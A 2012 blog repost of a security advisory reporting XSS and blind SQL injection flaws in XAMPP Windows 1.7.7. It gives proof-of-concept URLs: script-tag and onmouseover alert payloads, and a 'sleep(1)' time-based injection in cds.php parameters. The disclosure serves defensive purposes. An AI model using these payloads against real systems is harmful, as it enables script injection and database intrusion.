Jun 14, 2012

XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities

$------------------------------------------------------------------------------------------------------------
$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.apachefriends.org/en/xampp-windows.html
$ Date :06/07/2012
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:

 XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really
 very easy to install and to use - just download, extract and start.


2. POC:

XSS Vulnerabilities:

http://localhost/xampp/perlinfo.pl/"<script>alert("XSS")</script>

http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E --> still not fixed from version 1.7.4

Blind SQL Injection:

http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606

 


Source: packetstormsecurity.org/files/113614

If you like my blog, Please Donate Me

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |